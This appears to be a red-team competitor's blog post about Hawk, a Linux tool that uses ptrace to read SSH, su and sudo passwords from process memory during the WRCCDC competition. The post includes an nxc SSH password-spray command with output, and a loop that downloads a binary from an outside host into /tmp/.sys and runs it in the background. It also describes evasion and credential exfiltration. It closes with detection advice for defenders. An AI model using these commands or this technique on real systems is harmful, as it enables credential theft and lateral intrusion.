Hawk: Automated Credential Harvesting in WRCCDC
There is a moment in every WRCCDC competition where the game shifts. You stop thinking about one host at a time, and start thinking about gravity. One good credential can pull an entire subnet toward you if you can catch it fast enough.
This post is the story of how Hawk happened, why I built it, and why it keeps paying rent in competitions. It is also a love letter to a tool that came before it, 3snake, and the very real pain of doing credential harvesting manually at scale.
If you want the code first, here it is: https://github.com/platsecurity/Hawk
The Old Way: 3snake Was Brilliant, But My Wrists Hated It
Let me start with credit where it is due. 3snake is one of those tools that makes you grin when you first read it. It quietly attaches to sshd, passwd, su and sudo, watches the password auth syscalls, and pulls credentials straight out of process memory without patching binaries or dropping kernel modules. Read only. Transparent. Clean.
In early competitions, 3snake gave us something that felt unfair in the best way. We would pop a Linux box, plant 3snake, and wait. The blue team would rotate passwords, log back in, and suddenly we had their shiny new creds. That loop alone wins red vs blue team competitions.
But there was a catch.
3snake was built for the real world, not for a ten-host-per-minute credential firehose. In WRCCDC, the volume is silly. Credentials come in bursts, from multiple hosts, while you are already juggling persistence, pivots, lateral movement, and the clock. Capturing those creds manually and reusing them fast enough became a huge pain. You would see a password, copy it, paste it into your notes, try it somewhere else, miss a timing window, then do it again. At scale, that is a slow leak.
I wanted the genius of 3snake, without the manual glue.
So I built Hawk.
What Hawk Is (One Sentence, Then the Real One)
Technical definition: Hawk is a lightweight Golang tool that silently intercepts SSH, su, and (soon) sudo credentials on Linux in real time, by tracing authentication syscalls and reading the password from memory. It does not modify target processes, it performs zero writes, it just watches and collects.
The real one is simpler: Hawk is 3snake adapted for competition tempo, with the boring parts automated and the output piped exactly where I need it.
Under the Hood: The Part Where the Bird Learns to Hunt
Hawk does two things over and over:
1. Find Interesting Processes
It walks /proc to detect new sshd, su, and sudo related processes that are about to handle password auth.
2. Attach, Watch the Right Syscalls, and Read the Password
Using ptrace, Hawk hooks into the target process and monitors read or write syscalls tied to password-based authentication. When the password is in the buffer, Hawk copies it from memory and formats it as a credential event.
There is something deeply satisfying about this approach. It is surgical. No binary patching. No LD_PRELOAD trickery. No kernel module that screams at every integrity monitor. The process never knows you were there.
If you have ever stared at the raw syscall stream for sudo, you already know the core idea. sudo reads the password one byte at a time from a dedicated file descriptor. If you can trace those reads, you can reconstruct the string as it flows.
You do not have to be loud to be effective. You just have to be present at the right microsecond.
The WRCCDC Loop: Where Hawk Turns One Foothold Into a Campaign
Here is the playbook I keep coming back to in WRCCDC. It works because it matches how blue teams behave under pressure.
Step 1: Compromise One Linux Host
Nothing fancy, just a foothold. Once I have root or equivalent, I am thinking about keeping the door open and expanding.
Step 2: Drop Hawk and Let It Perch
After the compromise, Hawk goes on the host as a background process. The goal is not to interact with it constantly, the goal is to let it quietly watch.
I kept adding obfuscation and evasion for competition use, but I am not going to burn those details here. The important thing is that Hawk is stable, low noise, and can sit there while everything else is on fire.
Step 3: Wait for the Blue Team to Do What They Always Do
In WRCCDC, blue teams rotate passwords early and often. They have to.
They log in with the new team password to validate changes, fix services, or just survive. That is the moment Hawk is built for. It catches the SSH password or sudo password as it is typed, then exfils it back to my box.
Step 4: Cred Reuse at Machine Speed
This is where Hawk beats my old manual workflow.
As soon as a new credential hits, I test it against other Linux hosts. I like NetExec (nxc) for this since it makes SSH spray and validation fast, consistent, and easy to script. If it works, I repipe it into the next batch of targets in that subnet, and suddenly one password becomes many sessions.
Here's what the automation looks like in practice:
# Hawk captures: jdavis:CompanyP@ss2024! # Immediately test against subnet targets nxc ssh 10.0.1.0/24 -u jdavis -p 'CompanyP@ss2024!' --continue-on-success SSH 10.0.1.15 22 web-srv-01 [+] jdavis:CompanyP@ss2024! (Pwn3d!) SSH 10.0.1.23 22 db-primary [+] jdavis:CompanyP@ss2024! (Pwn3d!) SSH 10.0.1.31 22 app-server-02 [+] jdavis:CompanyP@ss2024! (Pwn3d!) SSH 10.0.1.44 22 backup-node [+] jdavis:CompanyP@ss2024! (Pwn3d!) SSH 10.0.1.67 22 monitoring-box [+] jdavis:CompanyP@ss2024! (Pwn3d!) # Deploy Hawk to all successful hosts for host in web-srv-01 db-primary app-server-02 backup-node monitoring-box; do nxc ssh 10.0.1.$host -u jdavis -p 'CompanyP@ss2024!' \ -x "wget -q hawk.platformsecurity.com/a7f3c9e2 -O /tmp/.sys && chmod +x /tmp/.sys && nohup /tmp/.sys &" done # One credential → Five new Hawk instances harvesting in parallel
This is the moment the match tilts. The blue team thinks they are recovering. In reality, they just handed you the new keys.
Step 5: Repeat Until the Scoreboard Turns Into Confetti
Compromise, perch, harvest, reuse, pivot, repeat.
At the end of a good run you look up and realize you have a swarm. In one competition, the aftermath was over two hundred Sliver sessions across the environment.
That screenshot is still one of my favorites because it captures the entire point of Hawk. It is not about a single credential. It is about a feedback loop that scales faster than humans can.
Why It Dominates: The Boring Truth Behind the Wow Factor
Hawk wins in WRCCDC competitions for three reasons:
1. It Weaponizes Blue Team Hygiene
Password rotations are supposed to lock attackers out. Hawk turns them into lateral movement fuel.
2. It Removes the Human Bottleneck
3snake gave me the data, Hawk gives me the tempo. Automation is the difference between catching a credential and missing it while you are busy elsewhere.
3. It Is Built to Be Quiet and Reliable
Read-only memory harvesting through ptrace is hard to detect in a chaotic competition environment, and Hawk stays stable even when ten other things are happening at once.
The wow factor is not magic. It is just speed plus patience.
Closing Thoughts: What I Am Building Next
Hawk exists because I wanted to take a great idea and tune it for the way competitions actually feel. 3snake showed the path. Hawk made the path fast enough to matter when the clock is brutal.
If you are a defender reading this, the takeaway is not despair. The takeaway is detection and response maturity. Watch for ptrace abuse, watch for strange process parenting, watch outbound webhook-style exfil, and assume any password typed on a compromised host is a password already lost.
If you are a competitor, you already know the dopamine hit when a credential lands at the perfect time. This tool is me trying to bottle that moment and make it repeatable.
I will keep iterating, because the bird is still hungry.